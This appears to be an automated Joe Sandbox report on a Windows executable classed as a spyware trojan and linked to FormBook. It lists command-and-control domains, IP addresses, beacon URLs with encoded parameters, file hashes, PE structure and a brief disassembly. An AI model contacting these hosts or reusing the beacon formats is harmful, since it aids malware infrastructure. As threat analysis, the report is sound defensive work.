                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icorasdial.exe, 00000006.00000003.1896530877.000000000821E000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchrasdial.exe, 00000006.00000003.1896530877.000000000821E000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              http://www.lgdiamonds.infoGVXcOVOPuWmumK.exe, 00000007.00000002.2587932076.0000000005569000.00000040.80000000.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=rasdial.exe, 00000006.00000003.1896530877.000000000821E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=rasdial.exe, 00000006.00000003.1896530877.000000000821E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://www.ecosia.org/newtab/rasdial.exe, 00000006.00000003.1896530877.000000000821E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=rasdial.exe, 00000006.00000003.1896530877.000000000821E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs
                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      130.185.109.77
                                                      www.lgdiamonds.infoGermany
                                                      51191XIRRADEfalse
                                                      13.248.169.48
                                                      www.bcg.servicesUnited States
                                                      16509AMAZON-02USfalse
                                                      23.167.152.41
                                                      gtml.huksa.huhusddfnsuegcdn.comReserved
                                                      395774ESVC-ASNUSfalse
                                                      154.23.178.231
                                                      43kdd.topUnited States
                                                      174COGENT-174USfalse
                                                      Joe Sandbox version:42.0.0 Malachite
                                                      Analysis ID:1587909
                                                      Start date and time:2025-01-10 19:16:07 +01:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 9m 11s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Number of analysed new started processes analysed:11
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:2
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample name:cNDddMAF5u.exe
                                                      renamed because original name is a hash value
                                                      Original Sample Name:e9882b5a646f9dd7be8e8f48f15b39e22609789546b7e716b1e38c8354b8fd64.exe
                                                      Detection:MAL
                                                      Classification:mal100.troj.spyw.evad.winEXE@7/3@7/4
                                                      EGA Information:
                                                      • Successful, ratio: 75%
                                                      HCA Information:
                                                      • Successful, ratio: 91%
                                                      • Number of executed functions: 43
                                                      • Number of non-executed functions: 286
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe
                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                      • Excluded IPs from analysis (whitelisted): 13.107.246.45, 52.149.20.212
                                                      • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, d.4.1.9.1.6.7.1.0.0.0.0.0.0.0.0.1.0.0.9.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, fe3cr.delivery.mp.microsoft.com
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                      TimeTypeDescription
                                                      15:09:02API Interceptor1491207x Sleep call for process: rasdial.exe modified
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      130.185.109.77lgkWBwqY15.exeGet hashmaliciousFormBookBrowse
                                                      • www.lgdiamonds.info/cv1w/
                                                      New quotation request.exeGet hashmaliciousFormBookBrowse
                                                      • www.lgdiamonds.info/cv1w/
                                                      New Order.exeGet hashmaliciousFormBookBrowse
                                                      • www.lgdiamonds.info/q2b2/
                                                      need quotations.exeGet hashmaliciousFormBookBrowse
                                                      • www.lgdiamonds.info/cv1w/
                                                      MaMsKRmgXZ.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • www.holzleisten24.shop/ro12/?pR-=YvLwEHT7dF3wqOWcBoJhBcwDYJ3uuNfwUzugM5jE2WtwH9yjz4WpnbfVNhN3mQxE4RMu&Wx=ChSLGhh0Mn9TylKP
                                                      Product24573.exeGet hashmaliciousFormBookBrowse
                                                      • www.berlinhealthweek.com/bpg5/?ti-8=LyKdFPBKAe5W&5eb6=MtyGvtjXetI/I8tDbK2owBF5n98UCX/xugphV/8mPC2YbHujdbNXelvuFR4JIdJe4QTgQSn6m54tdOdmKx2lgAvEQCI5kWwTVA==
                                                      Siirtokuitti_006703.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • www.printmyride.store/tchg/?O0qEM=QQ6dpIpAk027UR3BL5U7sG0DxH6sKQa5YnzY0agrXpda3w5URJfAhsqjtJqbY2/M8fhrkTh6mIV7dbZQ8z6SYrdm6JILdk9Mfg==&CF1Ki=UnDuQcdCFs1MNsvY
                                                      P5348574_74676.exeGet hashmaliciousFormBookBrowse
                                                      • www.berlinhealthweek.com/bpg5/?lpw7=MtyGvtjXetI/I8tDbK2owBF5n98UCX/xugphV/8mPC2YbHujdbNXelvuFR4JIdJe4QTgQSn6m54tdOdmKx2lgF7dehg5lWobVA==&UZCu=zJfEuRXw-P
                                                      535276_86376.exeGet hashmaliciousFormBookBrowse
                                                      • www.berlinhealthweek.com/bpg5/?yDcF=MtyGvtjXetI/I8tDbK2owBF5n98UCX/xugphV/8mPC2YbHujdbNXelvuFR4JIdJe4QTgQSn6m54tdOdmKx2k5SHNZX0bjzo+VQ==&jdd=UX4BZm
                                                      Product_List.exeGet hashmaliciousFormBookBrowse
                                                      • www.berlinhealthweek.com/bpg5/?JBfKk=_uLb4J-vJhW8&8mBWmPn=MtyGvtjXetI/I8tDbK2owBF5n98UCX/xugphV/8mPC2YbHujdbNXelvuFR4JIdJe4QTgQSn6m54tdOdmKx2lgF7dehg5lWobVA==
                                                      13.248.169.483HnH4uJtE7.exeGet hashmaliciousFormBookBrowse
                                                      • www.shipley.group/5g1j/
                                                      KcSzB2IpP5.exeGet hashmaliciousFormBookBrowse
                                                      • www.londonatnight.coffee/yvuf/?SDC=kadexEirh/+VAO8zLOQBjj7ri78LMX6rnGwiRgKyb2lIFzAlJiRuP0wbsEUUXC8rnmyzmDulN6bnJ3eZuWUqQAzy8gMCuzUMeqhoyPM0gWyFgi2HaQ==&mH=CpePy0P
                                                      TU0kiz3mxz.exeGet hashmaliciousFormBookBrowse
                                                      • www.cleans.xyz/m25s/?uTm8l=sq9EZiryngIYllrGGegSwTPcoSeG1wK7r99iAR3vBwBIUuCUohOmEZYbiast2lA9LyAZ&eN9dz=nR-4vpW
                                                      QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                      • www.bonheur.tech/t3iv/
                                                      QUOTATION#050125.exeGet hashmaliciousFormBookBrowse
                                                      • www.bonheur.tech/t3iv/
                                                      ORDER REF 47896798 PSMCO.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                      • www.londonatnight.coffee/13to/
                                                      236236236.elfGet hashmaliciousUnknownBrowse
                                                      • portlandbeauty.com/
                                                      profroma invoice.exeGet hashmaliciousFormBookBrowse
                                                      • www.aktmarket.xyz/wb7v/
                                                      SC_TR11670000_pdf.exeGet hashmaliciousFormBookBrowse
                                                      • www.xphone.net/i7vz/
                                                      RFQ_P.O.1212024.scrGet hashmaliciousFormBookBrowse
                                                      • www.krshop.shop/5p01/
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      gtml.huksa.huhusddfnsuegcdn.comWDpjhC3jpq.exeGet hashmaliciousFormBookBrowse
                                                      • 23.167.152.41
                                                      KSts9xW7qy.exeGet hashmaliciousFormBookBrowse
                                                      • 23.167.152.41
                                                      01152-11-12-24.exeGet hashmaliciousFormBookBrowse
                                                      • 23.167.152.41
                                                      Outstanding Invoices Spreadsheet Scan 00495_PDF.exeGet hashmaliciousFormBookBrowse
                                                      • 23.167.152.41
                                                      DRAFT COPY BL, CI & PL.exeGet hashmaliciousFormBookBrowse
                                                      • 23.167.152.41
                                                      lgkWBwqY15.exeGet hashmaliciousFormBookBrowse
                                                      • 23.167.152.41
                                                      New quotation request.exeGet hashmaliciousFormBookBrowse
                                                      • 23.167.152.41
                                                      Invoice 10493.exeGet hashmaliciousFormBookBrowse
                                                      • 23.167.152.41
                                                      HUEtVS3MQe.exeGet hashmaliciousFormBookBrowse
                                                      • 23.167.152.41
                                                      A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                      • 23.167.152.41
                                                      www.lgdiamonds.infolgkWBwqY15.exeGet hashmaliciousFormBookBrowse
                                                      • 130.185.109.77
                                                      New quotation request.exeGet hashmaliciousFormBookBrowse
                                                      • 130.185.109.77
                                                      New Order.exeGet hashmaliciousFormBookBrowse
                                                      • 130.185.109.77
                                                      need quotations.exeGet hashmaliciousFormBookBrowse
                                                      • 130.185.109.77
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      COGENT-174USzE1VxVoZ3W.exeGet hashmaliciousFormBookBrowse
                                                      • 38.181.21.54
                                                      https://sign-as.allarknow.online/Get hashmaliciousUnknownBrowse
                                                      • 50.7.127.10
                                                      http://pdfdrive.com.coGet hashmaliciousUnknownBrowse
                                                      • 143.244.56.53
                                                      https://www.cineuserdad.ecGet hashmaliciousUnknownBrowse
                                                      • 50.7.24.35
                                                      5.elfGet hashmaliciousUnknownBrowse
                                                      • 38.148.53.45
                                                      armv5l.elfGet hashmaliciousUnknownBrowse
                                                      • 38.12.137.2
                                                      https://aqctslc.com/Get hashmaliciousUnknownBrowse
                                                      • 38.165.16.38
                                                      3.elfGet hashmaliciousUnknownBrowse
                                                      • 154.22.18.26
                                                      Fantazy.mips.elfGet hashmaliciousUnknownBrowse
                                                      • 38.64.166.19
                                                      Fantazy.x86.elfGet hashmaliciousUnknownBrowse
                                                      • 161.82.13.62
                                                      AMAZON-02UShttps://eu2.contabostorage.com/69e36f1a5de941bb877627f90e79fd6d:gip/document.html#phishme@arrowbank.comGet hashmaliciousHTMLPhisherBrowse
                                                      • 108.138.26.73
                                                      RubzLi27lr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                      • 3.130.71.34
                                                      3HnH4uJtE7.exeGet hashmaliciousFormBookBrowse
                                                      • 13.248.169.48
                                                      https://www.mentimeter.com/app/presentation/alp52o7zih4ubnvbqe9pvb585a1z3bd7/edit?source=share-modalGet hashmaliciousUnknownBrowse
                                                      • 108.138.26.78
                                                      FG5wHs4fVX.exeGet hashmaliciousFormBookBrowse
                                                      • 18.143.155.63
                                                      KcSzB2IpP5.exeGet hashmaliciousFormBookBrowse
                                                      • 13.228.81.39
                                                      https://www.depoqq.win/genoGet hashmaliciousUnknownBrowse
                                                      • 34.250.141.206
                                                      phish_alert_sp2_2.0.0.0 (1).emlGet hashmaliciousUnknownBrowse
                                                      • 108.138.26.51
                                                      smQoKNkwB7.exeGet hashmaliciousFormBookBrowse
                                                      • 18.143.155.63
                                                      https://www.shinsengumiusa.com/mrloskieGet hashmaliciousUnknownBrowse
                                                      • 3.120.85.61
                                                      XIRRADElgkWBwqY15.exeGet hashmaliciousFormBookBrowse
                                                      • 130.185.109.77
                                                      New quotation request.exeGet hashmaliciousFormBookBrowse
                                                      • 130.185.109.77
                                                      New Order.exeGet hashmaliciousFormBookBrowse
                                                      • 130.185.109.77
                                                      need quotations.exeGet hashmaliciousFormBookBrowse
                                                      • 130.185.109.77
                                                      file.exeGet hashmaliciousSystemBCBrowse
                                                      • 185.169.24.192
                                                      Zam#U00f3wienie Z2300056_pdf .scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                      • 185.169.24.118
                                                      New order -24900242 OP_pdf .exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                      • 185.169.24.118
                                                      vAZYIEQMP8.elfGet hashmaliciousMirai, MoobotBrowse
                                                      • 195.138.242.157
                                                      MaMsKRmgXZ.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • 130.185.109.77
                                                      Product24573.exeGet hashmaliciousFormBookBrowse
                                                      • 130.185.109.77
                                                      ESVC-ASNUSWDpjhC3jpq.exeGet hashmaliciousFormBookBrowse
                                                      • 23.167.152.41
                                                      KSts9xW7qy.exeGet hashmaliciousFormBookBrowse
                                                      • 23.167.152.41
                                                      01152-11-12-24.exeGet hashmaliciousFormBookBrowse
                                                      • 23.167.152.41
                                                      Outstanding Invoices Spreadsheet Scan 00495_PDF.exeGet hashmaliciousFormBookBrowse
                                                      • 23.167.152.41
                                                      DRAFT COPY BL, CI & PL.exeGet hashmaliciousFormBookBrowse
                                                      • 23.167.152.41
                                                      lgkWBwqY15.exeGet hashmaliciousFormBookBrowse
                                                      • 23.167.152.41
                                                      New quotation request.exeGet hashmaliciousFormBookBrowse
                                                      • 23.167.152.41
                                                      A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                      • 23.167.152.41
                                                      Payment-251124.exeGet hashmaliciousFormBookBrowse
                                                      • 23.167.152.41
                                                      A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                      • 23.167.152.41
                                                      No context
                                                      No context
                                                      Process:C:\Users\user\Desktop\cNDddMAF5u.exe
                                                      File Type:data
                                                      Category:modified
                                                      Size (bytes):288256
                                                      Entropy (8bit):7.9916350467331885
                                                      Encrypted:true
                                                      SSDEEP:6144:9BApkzCQsdevN4ZML0xWu4ALetwehWOK+XYvkOoCwQxMnte:9mpk8Hi0Mdp6tMOvQe
                                                      MD5:D6DC301097A4B4410F739CFA0E42BA61
                                                      SHA1:84EE0AF5A0094083B47DEB7528288D38BAD90529
                                                      SHA-256:85820D4B6D58C2DA058454FBA8C8A35A1037F9B0F1CD87AD770A7F70E442C0BA
                                                      SHA-512:4D55E2E72D4D6AE4E7050F101A555F9BC593130DA34A77E4C4D63622E61B37A1B4E596E4E3E2340EBD7058A3E8835DAB6955F6E0037DABBEE40AB122AFC11396
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:...2HQ8QEEL9.O2.Q8QAEL9rAO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL9.AO2EN._A.E...N~.pl9(6lI@.(@*<.2 +"VFa-Wk#M?a,".v...&>\4oHA3.AO2KQ8Q8DE..!(.v1_.|%+.(...q1_.[....!(.Q...}%+.`(,Zv1_.AEL92AO2..8Q.DM9..PkKQ8QAEL9.AM3@P3QA.H92AO2KQ8Q!QL92QO2K!<QAE.92QO2KS8QGEL92AO2MQ8QAEL921K2KS8QAEL90A..KQ(QAUL92A_2KA8QAEL9"AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL9.5*J?Q8QE.H92QO2K.<QAUL92AO2KQ8QAEL9.AORKQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2
                                                      Process:C:\Windows\SysWOW64\rasdial.exe
                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                      Category:modified
                                                      Size (bytes):196608
                                                      Entropy (8bit):1.1215420383712111
                                                      Encrypted:false
                                                      SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                      MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                      SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                      SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                      SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                      Malicious:false
                                                      Reputation:moderate, very likely benign file
                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Users\user\Desktop\cNDddMAF5u.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):288256
                                                      Entropy (8bit):7.9916350467331885
                                                      Encrypted:true
                                                      SSDEEP:6144:9BApkzCQsdevN4ZML0xWu4ALetwehWOK+XYvkOoCwQxMnte:9mpk8Hi0Mdp6tMOvQe
                                                      MD5:D6DC301097A4B4410F739CFA0E42BA61
                                                      SHA1:84EE0AF5A0094083B47DEB7528288D38BAD90529
                                                      SHA-256:85820D4B6D58C2DA058454FBA8C8A35A1037F9B0F1CD87AD770A7F70E442C0BA
                                                      SHA-512:4D55E2E72D4D6AE4E7050F101A555F9BC593130DA34A77E4C4D63622E61B37A1B4E596E4E3E2340EBD7058A3E8835DAB6955F6E0037DABBEE40AB122AFC11396
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:...2HQ8QEEL9.O2.Q8QAEL9rAO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL9.AO2EN._A.E...N~.pl9(6lI@.(@*<.2 +"VFa-Wk#M?a,".v...&>\4oHA3.AO2KQ8Q8DE..!(.v1_.|%+.(...q1_.[....!(.Q...}%+.`(,Zv1_.AEL92AO2..8Q.DM9..PkKQ8QAEL9.AM3@P3QA.H92AO2KQ8Q!QL92QO2K!<QAE.92QO2KS8QGEL92AO2MQ8QAEL921K2KS8QAEL90A..KQ(QAUL92A_2KA8QAEL9"AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL9.5*J?Q8QE.H92QO2K.<QAUL92AO2KQ8QAEL9.AORKQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2KQ8QAEL92AO2
                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Entropy (8bit):7.155181819122473
                                                      TrID:
                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                      • DOS Executable Generic (2002/1) 0.02%
                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                      File name:cNDddMAF5u.exe
                                                      File size:1'266'176 bytes
                                                      MD5:caf89165d3dfdde3273cce4deade7db4
                                                      SHA1:89409de660c21df6b496060e42495a5d9346ed96
                                                      SHA256:e9882b5a646f9dd7be8e8f48f15b39e22609789546b7e716b1e38c8354b8fd64
                                                      SHA512:5a0726aeb4423b9c7c719f0b7f4df016325327cf209da1ad81a431ac990111c97de2bf078b08c85e81e05871bf7ad9b86d13da9bbccd30b4fc56c5fc7fa84d1c
                                                      SSDEEP:24576:nqDEvCTbMWu7rQYlBQcBiT6rprG8angsOayPasr5mMw:nTvC/MTQYxsWR7angstxstv
                                                      TLSH:2E45CF0273C1D022FFAB96334B5AF6515BBC69260123E62F13981D79BE701B1563E7A3
                                                      File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....
                                                      Icon Hash:aaf3e3e3938382a0
                                                      Entrypoint:0x420577
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x6760E1BA [Tue Dec 17 02:28:10 2024 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:5
                                                      OS Version Minor:1
                                                      File Version Major:5
                                                      File Version Minor:1
                                                      Subsystem Version Major:5
                                                      Subsystem Version Minor:1
                                                      Import Hash:948cc502fe9226992dce9417f952fce3
                                                      Instruction
                                                      call 00007FC394BCA903h
                                                      jmp 00007FC394BCA20Fh
                                                      push ebp
                                                      mov ebp, esp
                                                      push esi
                                                      push dword ptr [ebp+08h]
                                                      mov esi, ecx
                                                      call 00007FC394BCA3EDh
                                                      mov dword ptr [esi], 0049FDF0h
                                                      mov eax, esi
                                                      pop esi
                                                      pop ebp
                                                      retn 0004h
                                                      and dword ptr [ecx+04h], 00000000h
                                                      mov eax, ecx
                                                      and dword ptr [ecx+08h], 00000000h
                                                      mov dword ptr [ecx+04h], 0049FDF8h
                                                      mov dword ptr [ecx], 0049FDF0h
                                                      ret
                                                      push ebp
                                                      mov ebp, esp
                                                      push esi
                                                      push dword ptr [ebp+08h]
                                                      mov esi, ecx
                                                      call 00007FC394BCA3BAh
                                                      mov dword ptr [esi], 0049FE0Ch
                                                      mov eax, esi
                                                      pop esi
                                                      pop ebp
                                                      retn 0004h
                                                      and dword ptr [ecx+04h], 00000000h
                                                      mov eax, ecx
                                                      and dword ptr [ecx+08h], 00000000h
                                                      mov dword ptr [ecx+04h], 0049FE14h
                                                      mov dword ptr [ecx], 0049FE0Ch
                                                      ret
                                                      push ebp
                                                      mov ebp, esp
                                                      push esi
                                                      mov esi, ecx
                                                      lea eax, dword ptr [esi+04h]
                                                      mov dword ptr [esi], 0049FDD0h
                                                      and dword ptr [eax], 00000000h
                                                      and dword ptr [eax+04h], 00000000h
                                                      push eax
                                                      mov eax, dword ptr [ebp+08h]
                                                      add eax, 04h
                                                      push eax
                                                      call 00007FC394BCCFADh
                                                      pop ecx
                                                      pop ecx
                                                      mov eax, esi
                                                      pop esi
                                                      pop ebp
                                                      retn 0004h
                                                      lea eax, dword ptr [ecx+04h]
                                                      mov dword ptr [ecx], 0049FDD0h
                                                      push eax
                                                      call 00007FC394BCCFF8h
                                                      pop ecx
                                                      ret
                                                      push ebp
                                                      mov ebp, esp
                                                      push esi
                                                      mov esi, ecx
                                                      lea eax, dword ptr [esi+04h]
                                                      mov dword ptr [esi], 0049FDD0h
                                                      push eax
                                                      call 00007FC394BCCFE1h
                                                      test byte ptr [ebp+08h], 00000001h
                                                      pop ecx
                                                      Programming Language:
                                                      • [ C ] VS2008 SP1 build 30729
                                                      • [IMP] VS2008 SP1 build 30729
                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xc8e640x17c.rdata
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xd40000x5e630.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x1330000x7594.reloc
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0xb0ff00x1c.rdata
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0xc34000x18.rdata
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb10100x40.rdata
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x9c0000x894.rdata
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x10000x9ab1d0x9ac000a1473f3064dcbc32ef93c5c8a90f3a6False0.565500681542811data6.668273581389308IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                      .rdata0x9c0000x2fb820x2fc00c9cf2468b60bf4f80f136ed54b3989fbFalse0.35289185209424084data5.691811547483722IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .data0xcc0000x706c0x480053b9025d545d65e23295e30afdbd16d9False0.04356553819444445DOS executable (block device driver @\273\)0.5846666986982398IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                      .rsrc0xd40000x5e6300x5e800da23d8f8d8d0afd05eaf8ad6d3c53dd4False0.9318343874007936data7.906408115533948IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .reloc0x1330000x75940x7600c68ee8931a32d45eb82dc450ee40efc3False0.7628111758474576data6.7972128181359786IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                      RT_ICON0xd44a00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                      RT_ICON0xd45c80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                      RT_ICON0xd48b00x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                      RT_ICON0xd49d80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                      RT_ICON0xd58800x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                      RT_ICON0xd61280x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                      RT_ICON0xd66900x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                      RT_ICON0xd8c380x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                      RT_ICON0xd9ce00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                      RT_STRING0xda1480x594dataEnglishGreat Britain0.3333333333333333
                                                      RT_STRING0xda6dc0x68adataEnglishGreat Britain0.2735961768219833
                                                      RT_STRING0xdad680x490dataEnglishGreat Britain0.3715753424657534
                                                      RT_STRING0xdb1f80x5fcdataEnglishGreat Britain0.3087467362924282
                                                      RT_STRING0xdb7f40x65cdataEnglishGreat Britain0.34336609336609336
                                                      RT_STRING0xdbe500x466dataEnglishGreat Britain0.3605683836589698
                                                      RT_STRING0xdc2b80x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                      RT_RCDATA0xdc4100x55cc5data1.0003300808982754
                                                      RT_GROUP_ICON0x1320d80x76dataEnglishGreat Britain0.6610169491525424
                                                      RT_GROUP_ICON0x1321500x14dataEnglishGreat Britain1.15
                                                      RT_VERSION0x1321640xdcdataEnglishGreat Britain0.6181818181818182
